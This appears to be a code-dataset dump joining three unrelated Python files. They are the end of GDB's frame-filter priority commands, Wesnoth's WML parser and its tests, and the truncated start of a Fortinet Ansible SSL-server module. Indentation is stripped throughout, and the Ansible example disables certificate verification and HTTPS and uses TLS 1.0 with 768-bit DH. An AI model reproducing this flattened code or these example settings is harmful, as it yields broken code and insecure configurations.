"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple != None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: object to select printers.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = frame._return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple == None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
priority = self.get_filter_priority(list_name, filter_name);
except Exception:
e = sys.exc_info()[1]
print("Error printing filter priority for '"+name+"':"+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
| OpenSmalltalk/vm | processors/ARM/gdb-8.3.1/gdb/python/lib/gdb/command/frame_filters.py | Python | mit | 16,256 |
#!/usr/bin/env python3
# encoding: utf-8
"""
This parser uses the --preprocess option of wesnoth so a working
wesnoth executable must be available at runtime if the WML to parse
contains preprocessing directives.
Pure WML can be parsed as is.
For example:
wml = ""
[unit]
id=elve
name=Elve
[abilities]
[damage]
id=Ensnare
[/dama ge]
[/abilities]
[/unit]
""
p = Parser()
cfg = p.parse_text(wml)
for unit in cfg.get_all(tag = "unit"):
print(unit.get_text_val("id"))
print(unit.get_text_val("name"))
for abilities in unit.get_all(tag = "abilitities"):
for ability in abilities.get_all(tag = ""):
print(ability.get_name())
print(ability.get_text_val("id"))
Because no preprocessing is required, we did not have to pass the
location of the wesnoth executable to Parser.
The get_all method always returns a list over matching tags or
attributes.
The get_name method can be used to get the name and the get_text_val
method can be used to query the value of an attribute.
"""
import os, glob, sys, re, subprocess, argparse, tempfile, shutil
import atexit
tempdirs_to_clean = []
tmpfiles_to_clean = []
@atexit.register
def cleaner():
for temp_dir in tempdirs_to_clean:
shutil.rmtree(temp_dir, ignore_errors=True)
for temp_file in tmpfiles_to_clean:
os.remove(temp_file)
class WMLError(Exception):
"""
Catch this exception to retrieve the first error message from
the parser.
"""
def __init__(self, parser=None, message=None):
if parser:
self.line = parser.parser_line
self.wml_line = parser.last_wml_line
self.message = message
self.preprocessed = parser.preprocessed
def __str__(self):
return """WMLError:
%s %s
%s
%s
""" % (str(self.line), self.preprocessed, self.wml_line, self.message)
class StringNode:
"""
One part of an attribute's value. Because a single WML string
can be made from multiple translatable strings we model
it as a list of several StringNode each with its own text domain.
"""
def __init__(self, data: bytes):
self.textdomain = None # non-translatable by default
self.data = data
def wml(self) -> bytes:
if not self.data:
return b""
return self.data
def debug(self):
if self.textdomain:
return "_<%s>'%s'" % (self.textdomain,
self.data.decode("utf8", "ignore"))
else:
return "'%s'" % self.data.decode("utf8", "ignore")
def __str__(self):
return "StringNode({})".format(self.debug())
def __repr__(self):
return str(self)
class AttributeNode:
"""
A WML attribute. For example the "id=Elfish Archer" in:
[unit]
id=Elfish Archer
[/unit]
"""
def __init__(self, name, location=None):
self.name = name
self.location = location
self.value = [] # List of StringNode
def wml(self) -> bytes:
s = self.name + b"=\""
for v in self.value:
s += v.wml().replace(b"\"", b"\"\"")
s += b"\""
return s
def debug(self):
return self.name.decode("utf8") + "=" + " .. ".join(
[v.debug() for v in self.value])
def get_text(self, translation=None) -> str:
"""
Returns a text representation of the node's value. The
translation callback, if provided, will be called on each
partial string with the string and its corresponding textdomain
and the returned translation will be used.
"""
r = ""
for s in self.value:
ustr = s.data.decode("utf8", "ignore")
if translation:
r += translation(ustr, s.textdomain)
else:
r += ustr
return r
def get_binary(self):
"""
Returns the unmodified binary representation of the value.
"""
r = b""
for s in self.value:
r += s.data
return r
def get_name(self):
return self.name.decode("utf8")
def __str__(self):
return "AttributeNode({})".format(self.debug())
def __repr__(self):
return str(self)
class TagNode:
"""
A WML tag. For example the "unit" in this example:
[unit]
id=Elfish Archer
[/unit]
"""
def __init__(self, name, location=None):
self.name = name
self.location = location
# List of child elements, which are either of type TagNode or
# AttributeNode.
self.data = []
self.speedy_tags = {}
def wml(self) -> bytes:
"""
Returns a (binary) WML representation of the entire node.
All attribute values are enclosed in quotes and quotes are
escaped (as double quotes). Note that no other escaping is
performed (see the BinaryWML specification for additional
escaping you may require).
"""
s = b"[" + self.name + b"]\n"
for sub in self.data:
s += sub.wml() + b"\n"
s += b"[/" + self.name.lstrip(b'+') + b"]\n"
return s
def debug(self):
s = "[%s]\n" % self.name.decode("utf8")
for sub in self.data:
for subline in sub.debug().splitlines():
s += " %s\n" % subline
s += "[/%s]\n" % self.name.decode("utf8").lstrip('+')
return s
def get_all(self, **kw):
"""
This gets all child tags or child attributes of the tag.
For example:
[unit]
name=A
name=B
[attack]
[/attack]
[attack]
[/attack]
[/unit]
unit.get_all(att = "name")
will return two nodes for "name=A" and "name=B"
unit.get_all(tag = "attack")
will return two nodes for the two [attack] tags.
unit.get_all()
will return 4 nodes for all 4 sub-elements.
unit.get_all(att = "")
Will return the two attribute nodes.
unit.get_all(tag = "")
Will return the two tag nodes.
If no elements are found an empty list is returned.
"""
if len(kw) == 1 and "tag" in kw and kw["tag"]:
return self.speedy_tags.get(kw["tag"].encode("utf8"), [])
r = []
for sub in self.data:
ok = True
for k, v in list(kw.items()):
v = v.encode("utf8")
if k == "tag":
if not isinstance(sub, TagNode):
ok = False
elif v != b"" and sub.name != v:
ok = False
elif k == "att":
if not isinstance(sub, AttributeNode):
ok = False
elif v != b"" and sub.name != v:
ok = False
if ok:
r.append(sub)
return r
def get_text_val(self, name, default=None, translation=None, val=-1):
"""
Returns the value of the specified attribute. If the attribute
is given multiple times, the value number val is returned (default
behaviour being to return the last value). If the
attribute is not found, the default parameter is returned.
If a translation is specified, it should be a function which
when passed a unicode string and text-domain returns a
translation of the unicode string. The easiest way is to pass
it to gettext.translation if you have the binary message
catalogues loaded.
"""
x = self.get_all(att=name)
if not x: return default
return x[val].get_text(translation)
def get_binary(self, name, default=None):
"""
Returns the unmodified binary data for the first attribute
of the given name or the passed default value if it is not
found.
"""
x = self.get_all(att=name)
if not x: return default
return x[0].get_binary()
def append(self, node):
"""
Appends a child node (must be either a TagNode or
AttributeNode).
"""
self.data.append(node)
if isinstance(node, TagNode):
if node.name not in self.speedy_tags:
self.speedy_tags[node.name] = []
self.speedy_tags[node.name].append(node)
def get_name(self):
return self.name.decode("utf8")
def __str__(self):
return "TagNode({})".format(self.get_name())
def __repr__(self):
return str(self)
class RootNode(TagNode):
"""
The root node. There is exactly one such node.
"""
def __init__(self):
TagNode.__init__(self, None)
def debug(self):
s = ""
for sub in self.data:
for subline in sub.debug().splitlines():
s += subline + "\n"
return s
def __str__(self):
return "RootNode()"
def __repr__(self):
return str(self)
class Parser:
def __init__(self, wesnoth_exe=None, config_dir=None,
data_dir=None):
"""
wesnoth_exe - Wesnoth executable to use. This should have been
configured to use the desired data and config directories.
config_dir - The Wesnoth configuration directory, can be
None to use the wesnoth default.
data_dir - The Wesnoth data directory, can be None to use
the wesnoth default.
After parsing is done the root node of the result will be
in the root attribute.
"""
self.wesnoth_exe = wesnoth_exe
self.config_dir = None
if config_dir: self.config_dir = os.path.abspath(config_dir)
self.data_dir = None
if data_dir: self.data_dir = os.path.abspath(data_dir)
self.keep_temp_dir = None
self.temp_dir = None
self.no_preprocess = (wesnoth_exe is None)
self.preprocessed = None
self.verbose = False
self.last_wml_line = "?"
self.parser_line = 0
self.line_in_file = 42424242
self.chunk_start = "?"
def parse_file(self, path, defines="") -> RootNode:
"""
Parse the given file found under path.
"""
self.path = path
if not self.no_preprocess:
self.preprocess(defines)
return self.parse()
def parse_binary(self, binary: bytes, defines="") -> RootNode:
"""
Parse a chunk of binary WML.
"""
td, tmpfilePath = tempfile.mkstemp(prefix="wmlparser_",
suffix=".cfg")
with open(tmpfilePath, 'wb') as temp:
temp.write(binary)
os.close(td)
self.path = tmpfilePath
tmpfiles_to_clean.append(tmpfilePath)
if not self.no_preprocess:
self.preprocess(defines)
return self.parse()
def parse_text(self, text, defines="") -> RootNode:
"""
Parse a text string.
"""
return self.parse_binary(text.encode("utf8"), defines)
def preprocess(self, defines):
"""
This is called by the parse functions to preprocess the
input from a normal WML .cfg file into a preprocessed
.plain file.
"""
if self.keep_temp_dir:
output = self.keep_temp_dir
else:
output = tempfile.mkdtemp(prefix="wmlparser_")
tempdirs_to_clean.append(output)
self.temp_dir = output
commandline = [self.wesnoth_exe]
if self.data_dir:
commandline += ["--data-dir", self.data_dir]
if self.config_dir:
commandline += ["--config-dir", self.config_dir]
commandline += ["--preprocess", self.path, output]
if defines:
commandline += ["--preprocess-defines", defines]
if self.verbose:
print((" ".join(commandline)))
p = subprocess.Popen(commandline,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if self.verbose:
print((out + err).decode("utf8"))
self.preprocessed = output + "/" + os.path.basename(self.path) + \
".plain"
if not os.path.exists(self.preprocessed):
first_line = open(self.path).readline().strip()
raise WMLError(self, "Preprocessor error:\n" +
" ".join(commandline) + "\n" +
"First line: " + first_line + "\n" +
out.decode("utf8") +
err.decode("utf8"))
def parse_line_without_commands_loop(self, line: str) -> str:
"""
Once the .plain commands are handled WML lines are passed to
this.
"""
if not line: return
if line.strip():
self.skip_newlines_after_plus = False
if self.in_tag:
self.handle_tag(line)
return
if self.in_arrows:
arrows = line.find(b'>>')
if arrows >= 0:
self.in_arrows = False
self.temp_string += line[:arrows]
self.temp_string_node = StringNode(self.temp_string)
self.temp_string = b""
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
self.in_arrows = False
return line[arrows + 2:]
else:
self.temp_string += line
return
quote = line.find(b'"')
if not self.in_string:
arrows = line.find(b'<<')
if arrows >= 0 and (quote < 0 or quote > arrows):
self.parse_line_without_commands(line[:arrows])
self.in_arrows = True
return line[arrows + 2:]
if quote >= 0:
if self.in_string:
# double quote
if quote < len(line) - 1 and line[quote + 1] == b'"'[0]:
self.temp_string += line[:quote + 1]
return line[quote + 2:]
self.temp_string += line[:quote]
self.temp_string_node = StringNode(self.temp_string)
if self.translatable:
self.temp_string_node.textdomain = self.textdomain
self.translatable = False
self.temp_string = b""
if not self.temp_key_nodes:
raise WMLError(self, "Unexpected string value.")
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
self.in_string = False
return line[quote + 1:]
else:
self.parse_outside_strings(line[:quote])
self.in_string = True
return line[quote + 1:]
else:
if self.in_string:
self.temp_string += line
else:
self.parse_outside_strings(line)
def parse_line_without_commands(self, line):
while True:
line = self.parse_line_without_commands_loop(line)
if not line:
break
def parse_outside_strings(self, line):
"""
Parse a WML fragment outside of strings.
"""
if not line: return
if line.lstrip(b" \t").startswith(b"#textdomain "):
self.textdomain = line.lstrip(b" \t")[12:].strip().decode("utf8")
return
if not self.temp_key_nodes:
line = line.lstrip()
if not line: return
# Is it a tag?
if line.startswith(b"["):
self.handle_tag(line)
# No tag, must be an attribute.
else:
self.handle_attribute(line)
else:
for i, segment in enumerate(line.split(b"+")):
segment = segment.lstrip(b" \t")
if i > 0:
# If the last segment is empty (there was a plus sign
# at the end) we need to skip newlines.
self.skip_newlines_after_plus = not segment.strip()
if not segment: continue
if segment.rstrip(b" ") == b"_":
self.translatable = True
segment = segment[1:].lstrip(b" ")
if not segment: continue
self.handle_value(segment)
def handle_tag(self, line):
end = line.find(b"]")
if end < 0:
if line.endswith(b"\n"):
raise WMLError(self, "Expected closing bracket.")
self.in_tag += line
return
tag = (self.in_tag + line[:end])[1:]
self.in_tag = b""
if tag.startswith(b"/"):
self.parent_node = self.parent_node[:-1]
elif tag.startswith(b"+") and self.parent_node and self.parent_node[-1].get_all(tag=tag[1:].decode()):
node_to_append_to = self.parent_node[-1].get_all(tag=tag[1:].decode())[-1]
self.parent_node.append(node_to_append_to)
else:
node = TagNode(tag, location=(self.line_in_file, self.chunk_start))
if self.parent_node:
self.parent_node[-1].append(node)
self.parent_node.append(node)
self.parse_outside_strings(line[end + 1:])
def handle_attribute(self, line):
assign = line.find(b"=")
remainder = None
if assign >= 0:
remainder = line[assign + 1:]
line = line[:assign]
self.commas = 0
self.temp_key_nodes = []
for att in line.split(b","):
att = att.strip()
node = AttributeNode(att, location=(self.line_in_file, self.chunk_start))
self.temp_key_nodes.append(node)
if self.parent_node:
self.parent_node[-1].append(node)
if remainder:
self.parse_outside_strings(remainder)
def handle_value(self, segment):
def add_text(segment):
segment = segment.rstrip()
if not segment: return
n = len(self.temp_key_nodes)
maxsplit = n - self.commas - 1
if maxsplit < 0: maxsplit = 0
for subsegment in segment.split(b",", maxsplit):
self.temp_string += subsegment.strip()
self.temp_string_node = StringNode(self.temp_string)
self.temp_string = b""
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
if self.commas < n - 1:
self.commas += 1
# Finish assignment on newline, except if there is a
# plus sign before the newline.
add_text(segment)
if segment.endswith(b"\n") and not self.skip_newlines_after_plus:
self.temp_key_nodes = []
def parse(self) -> RootNode:
"""
Parse preprocessed WML into a tree of tags and attributes.
"""
# parsing state
self.temp_string = b""
self.temp_string_node = None
self.commas = 0
self.temp_key_nodes = []
self.in_string = False
self.in_arrows = False
self.textdomain = "wesnoth"
self.translatable = False
self.root = RootNode()
self.parent_node = [self.root]
self.skip_newlines_after_plus = False
self.in_tag = b""
command_marker_byte = bytes([254])
input = self.preprocessed
if not input: input = self.path
for rawline in open(input, "rb"):
compos = rawline.find(command_marker_byte)
self.parser_line += 1
# Everything from chr(254) to newline is the command.
if compos != 0:
self.line_in_file += 1
if compos >= 0:
self.parse_line_without_commands(rawline[:compos])
self.handle_command(rawline[compos + 1:-1])
else:
self.parse_line_without_commands(rawline)
if self.keep_temp_dir is None and self.temp_dir:
if self.verbose:
print(("removing " + self.temp_dir))
shutil.rmtree(self.temp_dir, ignore_errors=True)
return self.root
def handle_command(self, com):
if com.startswith(b"line "):
self.last_wml_line = com[5:]
_ = self.last_wml_line.split(b" ")
self.chunk_start = [(_[i + 1], int(_[i])) for i in range(0, len(_), 2)]
self.line_in_file = self.chunk_start[0][1]
elif com.startswith(b"textdomain "):
self.textdomain = com[11:].decode("utf8")
else:
raise WMLError(self, "Unknown parser command: " + com)
def get_all(self, **kw):
return self.root.get_all(**kw)
def get_text_val(self, name, default=None, translation=None):
return self.root.get_text_val(name, default, translation)
def jsonify(tree, verbose=False, depth=1):
"""
Convert a Parser tree into JSON
If verbose, insert a linebreak after every brace and comma (put every
item on its own line), otherwise, condense everything into a single line.
"""
import json
def node_to_dict(n):
d = {}
tags = set(x.get_name() for x in n.get_all(tag=""))
for tag in tags:
d[tag] = [node_to_dict(x) for x in n.get_all(tag=tag)]
for att in n.get_all(att=""):
d[att.get_name()] = att.get_text()
return d
print(json.dumps(node_to_dict(tree), indent=depth if verbose else None))
def xmlify(tree, verbose=False, depth=0):
import xml.etree.ElementTree as ET
def node_to_et(n):
et = ET.Element(n.get_name())
for att in n.get_all(att=""):
attel = ET.Element(att.get_name())
attel.text = att.get_text()
et.append(attel)
for tag in n.get_all(tag=""):
et.append(node_to_et(tag))
return et
ET.ElementTree(node_to_et(tree.get_all()[0])).write(
sys.stdout, encoding="unicode")
if __name__ == "__main__":
arg = argparse.ArgumentParser()
arg.add_argument("-a", "--data-dir", help="directly passed on to wesnoth.exe")
arg.add_argument("-c", "--config-dir", help="directly passed on to wesnoth.exe")
arg.add_argument("-i", "--input", help="a WML file to parse")
arg.add_argument("-k", "--keep-temp", help="specify directory where to keep temp files")
arg.add_argument("-t", "--text", help="WML text to parse")
arg.add_argument("-w", "--wesnoth", help="path to wesnoth.exe")
arg.add_argument("-d", "--defines", help="comma separated list of WML defines")
arg.add_argument("-T", "--test", action="store_true")
arg.add_argument("-j", "--to-json", action="store_true")
arg.add_argument("-v", "--verbose", action="store_true")
arg.add_argument("-x", "--to-xml", action="store_true")
args = arg.parse_args()
if not args.input and not args.text and not args.test:
sys.stderr.write("No input given. Use -h for help.\n")
sys.exit(1)
if (args.wesnoth and not os.path.exists(args.wesnoth)):
sys.stderr.write("Wesnoth executable not found.\n")
sys.exit(1)
if not args.wesnoth:
print("Warning: Without the -w option WML is not preprocessed!",
file=sys.stderr)
if args.test:
print("Running tests")
p = Parser(args.wesnoth, args.config_dir,
args.data_dir)
if args.keep_temp:
p.keep_temp_dir = args.keep_temp
if args.verbose: p.verbose = True
only = None
def test2(input, expected, note, function):
if only and note != only: return
input = input.strip()
expected = expected.strip()
p.parse_text(input)
output = function(p).strip()
if output != expected:
print("__________")
print(("FAILED " + note))
print("INPUT:")
print(input)
print("OUTPUT:")
print(output)
print("EXPECTED:")
print(expected)
print("__________")
else:
print(("PASSED " + note))
def test(input, expected, note):
test2(input, expected, note, lambda p: p.root.debug())
def test_with_preprocessor(input, expected, note):
if not args.wesnoth:
print("SKIPPED WITHOUT PREPROCESSOR " + note)
return
test(input, expected, note)
test(
"""
[test]
a=1
[/test]
""", """
[test]
a='1'
[/test]
""", "simple")
test(
"""
[+foo]
a=1
[/foo]
""", """
[+foo]
a='1'
[/foo]
""", "+foo without foo in toplevel")
test(
"""
[foo]
[+bar]
a=1
[/bar]
[/foo]
""", """
[foo]
[+bar]
a='1'
[/bar]
[/foo]
""", "+foo without foo in child")
test(
"""
[test]
[foo]
a=1
[/foo]
[/test]
""", """
[test]
[foo]
a='1'
[/foo]
[/test]
""", "subtag, part 1")
test(
"""
[test]
[foo]
a=1
[/foo]
[/test]
[+test]
[+foo]
[/foo]
[/test]
""", """
[test]
[foo]
a='1'
[/foo]
[/test]
""", "subtag, part 2")
test(
"""
[test]
a, b, c = 1, 2, 3
[/test]
""", """
[test]
a='1'
b='2'
c='3'
[/test]
""", "multi assign")
test(
"""
[test]
a, b = 1, 2, 3
[/test]
""", """
[test]
a='1'
b='2, 3'
[/test]
""", "multi assign 2")
test(
"""
[test]
a, b, c = 1, 2
[/test]
""", """
[test]
a='1'
b='2'
c=
[/test]
""", "multi assign 3")
test_with_preprocessor(
"""
#textdomain A
#define X
_ "abc"
#enddef
#textdomain B
[test]
x = _ "abc" + {X}
[/test]
""", """
[test]
x=_<B>'abc' .. _<A>'abc'
[/test]
""", "textdomain")
test(
"""
[test]
x,y = _1,_2
[/test]
""", """
[test]
x='_1'
y='_2'
[/test]
""", "underscores")
test(
"""
[test]
a = "a ""quoted"" word"
[/test]
""",
"""
[test]
a='a "quoted" word'
[/test]
""", "quoted")
test(
"""
[test]
code = <<
"quotes" here
""blah""
>>
[/test]
""",
"""
[test]
code='
"quotes" here
""blah""
'
[/test]
""", "quoted2")
test(
"""
foo="bar"+
"baz"
""",
"""
foo='bar' .. 'baz'
""", "multi line string")
test_with_preprocessor(
"""
#define baz
"baz"
#enddef
foo="bar"+{baz}
""",
"""
foo='bar' .. 'baz'
""", "defined multi line string")
test_with_preprocessor(
"""
foo="bar" + "baz" # blah
""",
"""
foo='bar' .. 'baz'
""", "comment after +")
test_with_preprocessor(
"""
#define baz
"baz"
#enddef
foo="bar" {baz}
""",
"""
foo='bar' .. 'baz'
""", "defined string concatenation")
test_with_preprocessor(
"""
#define A BLOCK
[{BLOCK}]
[/{BLOCK}]
#enddef
{A blah}
""",
"""
[blah]
[/blah]
""", "defined tag")
test2(
"""
[test]
a=1
b=2
a=3
b=4
[/test]
""", "3, 4", "multiatt",
lambda p:
p.get_all(tag = "test")[0].get_text_val("a") + ", " +
p.get_all(tag = "test")[0].get_text_val("b"))
sys.exit(0)
p = Parser(args.wesnoth, args.config_dir, args.data_dir)
if args.keep_temp:
p.keep_temp_dir = args.keep_temp
if args.verbose: p.verbose = True
if args.input:
p.parse_file(args.input, args.defines)
elif args.text:
p.parse_text(args.text, args.defines)
if args.to_json:
jsonify(p.root, True)
print()
elif args.to_xml:
print('<?xml version="1.0" encoding="UTF-8" ?>')
print('<root>')
xmlify(p.root, True, 1)
print('</root>')
else:
print((p.root.debug()))
| spixi/wesnoth | data/tools/wesnoth/wmlparser3.py | Python | gpl-2.0 | 27,879 |
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_ssl_server
short_description: Configure SSL servers in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify firewall feature and ssl_server category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
This attribute was present already in previous version in a deeper level.
It has been moved out to this outer level.
type: str
required: false
choices:
- present
- absent
version_added: 2.9
firewall_ssl_server:
description:
- Configure SSL servers.
default: null
type: dict
suboptions:
state:
description:
- B(Deprecated)
- Starting with Ansible 2.9 we recommend using the top-level 'state' parameter.
- HORIZONTALLINE
- Indicates whether to create or remove the object.
type: str
required: false
choices:
- present
- absent
add_header_x_forwarded_proto:
description:
- Enable/disable adding an X-Forwarded-Proto header to forwarded requests.
type: str
choices:
- enable
- disable
ip:
description:
- IPv4 address of the SSL server.
type: str
mapped_port:
description:
- Mapped server service port (1 - 65535).
type: int
name:
description:
- Server name.
required: true
type: str
port:
description:
- Server service port (1 - 65535).
type: int
ssl_algorithm:
description:
- Relative strength of encryption algorithms accepted in negotiation.
type: str
choices:
- high
- medium
- low
ssl_cert:
description:
- Name of certificate for SSL connections to this server. Source vpn.certificate.local.name.
type: str
ssl_client_renegotiation:
description:
- Allow or block client renegotiation by server.
type: str
choices:
- allow
- deny
- secure
ssl_dh_bits:
description:
- Bit-size of Diffie-Hellman (DH) prime used in DHE-RSA negotiation.
type: str
choices:
- 768
- 1024
- 1536
- 2048
ssl_max_version:
description:
- Highest SSL/TLS version to negotiate.
type: str
choices:
- tls-1.0
- tls-1.1
- tls-1.2
ssl_min_version:
description:
- Lowest SSL/TLS version to negotiate.
type: str
choices:
- tls-1.0
- tls-1.1
- tls-1.2
ssl_mode:
description:
- SSL/TLS mode for encryption and decryption of traffic.
type: str
choices:
- half
- full
ssl_send_empty_frags:
description:
- Enable/disable sending empty fragments to avoid attack on CBC IV.
type: str
choices:
- enable
- disable
url_rewrite:
description:
- Enable/disable rewriting the URL.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure SSL servers.
fortios_firewall_ssl_server:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_ssl_server:
add_header_x_forwarded_proto: "enable"
ip: "<your_own_value>"
mapped_port: "5"
name: "default_name_6"
port: "7"
ssl_algorithm: "high"
ssl_cert: "<your_own_value> (source vpn.certificate.local.name)"
ssl_client_renegotiation: "allow"
ssl_dh_bits: "768"
ssl_max_version: "tls-1.0"
ssl_min_version: "tls-1.0"
ssl_mode: "half"
ssl_send_empty_frags: "enable"
url_rewrite: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_ssl_server_data(json):
option_list = ['add_header_x_forwarded_proto', 'ip', 'mapped_port',
'name', 'port', 'ssl_algorithm',
'ssl_cert', 'ssl_client_renegotiation', 'ssl_dh_bits',
'ssl_max_version', 'ssl_min_version', 'ssl_mode',
'ssl_send_empty_frags', 'url_rewrite']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for i, elem in enumerate(data):
data[i] = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def firewall_ssl_server(data, fos):
vdom = data['vdom']
if 'state' in data and data['state']:
state = data['state']
elif 'state' in data['firewall_ssl_server'] and data['firewall_ssl_server']:
state = data['firewall_ssl_server']['state']
else:
state = True
firewall_ssl_server_data = data['firewall_ssl_server']
filtered_data = underscore_to_hyphen(filter_firewall_ssl_server_data(firewall_ssl_server_data))
if state == "present":
return fos.set('firewall',
'ssl-server',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'ssl-server',
mkey=filtered_data['name'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_firewall(data, fos):
if data['firewall_ssl_server']:
resp = firewall_ssl_server(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "default": "", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": False, "type": "str",
"choices": ["present", "absent"]},
"firewall_ssl_server": {
"required": False, "type": "dict", "default": None,
"options": {
"state": {"required": False, "type": "str",
"choices": ["present", "absent"]},
"add_header_x_forwarded_proto": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
